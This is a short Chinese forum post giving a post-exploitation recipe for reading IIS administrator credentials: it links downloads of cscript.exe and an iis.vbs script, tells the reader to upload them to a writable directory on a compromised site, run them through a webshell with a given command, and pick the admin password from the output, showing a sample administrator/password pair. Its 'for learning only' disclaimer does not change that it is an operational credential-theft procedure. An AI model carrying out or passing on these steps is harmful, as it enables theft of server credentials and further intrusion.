渗透提权之读取IIS文件密码
本文仅供学习参考,温馨提醒:法网无情!
==========分=========割=========线============
利用工具:
cscript.exe:https://pan.baidu.com/s/1pJwzeht
iis.vbs: https://pan.baidu.com/s/1ntBwtZj
把这两个工具上传到网站可读可写目录里,然后用大马执行cmd命令
CMD命令1:"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\cagj\web\iis.vbs
然后就出现一堆回显,然后自己在里面找管理员账号密码就OK了!
如:
7i24虚拟主机管理平台受控端 administrator asdadmin :80:sys.avzhan.com C:\WINDOWS\7i24.com\FreeHost
账户:administrator
密码:asdadmin
--------------------------------------------------------------------------------------------
i技术论坛:.https://bbs.ijishu.org
网络安全爱好者技术交流平台
评论